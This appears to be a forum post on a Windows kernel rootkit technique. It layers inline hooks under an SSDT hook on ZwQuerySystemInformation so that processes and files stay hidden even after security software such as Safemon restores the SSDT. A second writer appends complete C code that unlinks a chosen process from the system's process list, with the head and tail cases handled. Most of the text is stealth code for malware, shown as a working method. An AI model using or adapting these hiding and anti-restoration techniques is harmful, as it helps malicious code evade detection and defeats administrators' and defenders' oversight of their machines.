Author: HSQ
Hooking really is an art. In the fight to survive, it does a good job.
Here I only discuss the approach, not the full code.
Code:
// Two-layer HOOK, step 1: install the inline hooks first, while no SSDT hook is in place yet.
...
SetInLineHookZwQueryDirectoryFile();
SetInLineHookZwQuerySystemInformation();
// Two-layer HOOK, step 2: then install the outer SSDT hook. This way, even if the SSDT hook is
// restored by another tool, the inner inline hook keeps working.
InHookSSDTNativeAPI();
...
//////////////////////////////////////////////////////////////////////////////
.....................
////////////////////// Do anything ///////////////////////////////////////////
// Hide process (inside the inline hook of ZwQuerySystemInformation, after the original call)
if(NT_SUCCESS(ntStatus))
{
    // What does the SSDT slot for ZwQuerySystemInformation point to right now?
    ZWQUERYSYSTEMINFORMATION TempCheckInSSDTSpace = (ZWQUERYSYSTEMINFORMATION)SYSTEMSERVICE(ZwQuerySystemInformation);
    // Check whether our SSDT hook is still there, so the list is not filtered twice. Filtering it
    // twice would not BSOD either; that is how robust the code is ^-^
    if(HookSSDTZwQuerySystemInformation != TempCheckInSSDTSpace)
    {
        // Our SSDT hook has been removed: let the inline hook take over and keep hiding.
        //if(0x81000000 > (ULONG)TempCheckInSSDTSpace)
        HideFileFromZwQuerySystemInformation(SystemInformationClass, SystemInformation);
        if(TempCheckInSSDTSpace != OldZwQuerySystemInformation)
        {
            // The slot holds neither our hook nor the original, so another tool's hook now sits
            // in the SSDT. Check the IRQL before printing, to avoid a BSOD.
            if(DISPATCH_LEVEL >= KeGetCurrentIrql())
            {
                // Do not burn CPU time here: if Safemon.sys is dispatching the call, system
                // resources could be exhausted. An SSDT hook from SMM cannot be bypassed, so the
                // inline hook has to stand up to this kind of test ^-^
                DbgPrint("Rootkit: Hook Inline ZwQuerySystemInformation() Worked ok!\n");
            }
        }
        else
        {
            // The slot is back to the original function: the inline hook alone does the work.
            DbgPrint("Rootkit: Hook Inline ZwQuerySystemInformation() Worked ok!\n");
        }
    }
    else
    {
        DbgPrint("Rootkit: SSDT HOOK ZwQuerySystemInformation still in place, Inline Hook has nothing more to do!\n");
    }
}
////////////////////// Do anything ///////////////////////////////////////////
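The post calls HideFileFromZwQuerySystemInformation but never shows it, and the two-layer decision is buried between DbgPrint branches. The following is an added example of mine, not HSQ's code: a user-mode C model of (1) the decision the inline hook makes from the current SSDT slot value and (2) the SystemProcessInformation unlink that such a hide routine has to perform, including the head-of-list and tail edge cases. ProcInfo is a two-field stand-in for SYSTEM_PROCESS_INFORMATION; the function names, the PIDs and entry sizes of the sample list are all assumptions made for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Two-field stand-in for SYSTEM_PROCESS_INFORMATION (assumption: the real
 * structure has many more fields; the unlink only needs these two). */
typedef struct {
    uint32_t NextEntryOffset;  /* bytes to the next entry, 0 on the last one */
    uint32_t UniqueProcessId;  /* PID (a HANDLE in the real structure) */
} ProcInfo;

/* The decision the inline hook body makes, from three addresses:
 *   slot     : what SYSTEMSERVICE(ZwQuerySystemInformation) points to now
 *   ourHook  : HookSSDTZwQuerySystemInformation
 *   original : OldZwQuerySystemInformation
 * 0 = our SSDT hook is still in place, the inline layer does nothing
 * 1 = the slot holds the original again, the inline layer must filter
 * 2 = the slot holds a third-party hook, the inline layer must filter */
int InlineLayerDecision(uintptr_t slot, uintptr_t ourHook, uintptr_t original)
{
    if (slot == ourHook)  return 0;
    if (slot == original) return 1;
    return 2;
}

/* Unlink every entry with the given PID from a SystemProcessInformation
 * buffer of len bytes. Returns the number of entries hidden. */
int HideProcessByPid(uint8_t *buf, size_t len, uint32_t pid)
{
    int hidden = 0;
    ProcInfo *prev = NULL;
    ProcInfo *cur = (ProcInfo *)buf;
    for (;;) {
        uint32_t off = cur->NextEntryOffset;
        ProcInfo *next = off ? (ProcInfo *)((uint8_t *)cur + off) : NULL;
        if (cur->UniqueProcessId != pid) {
            if (!next) break;
            prev = cur;
            cur = next;
        } else if (prev) {
            /* Middle or tail entry: make the predecessor skip over it. */
            prev->NextEntryOffset = next ? prev->NextEntryOffset + off : 0;
            hidden++;
            if (!next) break;
            cur = next;
        } else if (next) {
            /* Head entry: slide the rest of the buffer down over it. Offsets
             * are relative, so the remaining chain stays valid; the new head
             * is examined again on the next pass. */
            memmove(buf, buf + off, len - off);
            len -= off;
            hidden++;
        } else {
            break;  /* sole entry: an empty list cannot be expressed, leave it */
        }
    }
    return hidden;
}

/* Collect the PIDs still visible, in list order. Returns the entry count. */
int ListPids(const uint8_t *buf, uint32_t *out, int cap)
{
    int n = 0;
    const ProcInfo *cur = (const ProcInfo *)buf;
    for (;;) {
        if (n < cap) out[n] = cur->UniqueProcessId;
        n++;
        if (!cur->NextEntryOffset) return n;
        cur = (const ProcInfo *)((const uint8_t *)cur + cur->NextEntryOffset);
    }
}

/* Constructed sample list with entries of different sizes, as in the real
 * buffer (each entry is followed by its thread array). */
static size_t AppendEntry(uint8_t *buf, size_t len, uint32_t size, uint32_t pid, int last)
{
    ProcInfo *e = (ProcInfo *)(buf + len);
    memset(e, 0, size);
    e->NextEntryOffset = last ? 0 : size;
    e->UniqueProcessId = pid;
    return len + size;
}

size_t BuildSampleList(uint8_t *buf)
{
    size_t len = 0;
    len = AppendEntry(buf, len, 32, 0, 0);      /* Idle, head of the list */
    len = AppendEntry(buf, len, 48, 4, 0);      /* System */
    len = AppendEntry(buf, len, 40, 1234, 0);   /* the one we want to hide */
    return AppendEntry(buf, len, 56, 2048, 1);  /* tail */
}

/* Demo helpers: rebuild the sample, hide pid, report the outcome. */
int DemoHiddenCount(uint32_t pid)
{
    static ProcInfo storage[64];                /* suitably aligned backing store */
    uint8_t *buf = (uint8_t *)storage;
    return HideProcessByPid(buf, BuildSampleList(buf), pid);
}

long DemoPidAfterHide(uint32_t pid, int idx)    /* PID at idx after hiding, or -1 */
{
    static ProcInfo storage[64];
    uint8_t *buf = (uint8_t *)storage;
    uint32_t pids[8];
    int n;
    HideProcessByPid(buf, BuildSampleList(buf), pid);
    n = ListPids(buf, pids, 8);
    return idx < n ? (long)pids[idx] : -1;
}

int main(void)
{
    int i;
    printf("decision, slot == original: %d\n", InlineLayerDecision(0x7000, 0x8000, 0x7000));
    printf("hidden %d entries; visible PIDs:", DemoHiddenCount(1234));
    for (i = 0; DemoPidAfterHide(1234, i) >= 0; i++)
        printf(" %ld", DemoPidAfterHide(1234, i));
    printf("\n");
    return 0;
}
```

The head case matters in practice: the first entry is the Idle process, and a hide routine that only patches the predecessor's NextEntryOffset has no predecessor to patch there, so it must move the buffer instead. In the kernel the same walk runs on the caller's SystemInformation buffer after the original call returned success, exactly where the inline hook above calls HideFileFromZwQuerySystemInformation.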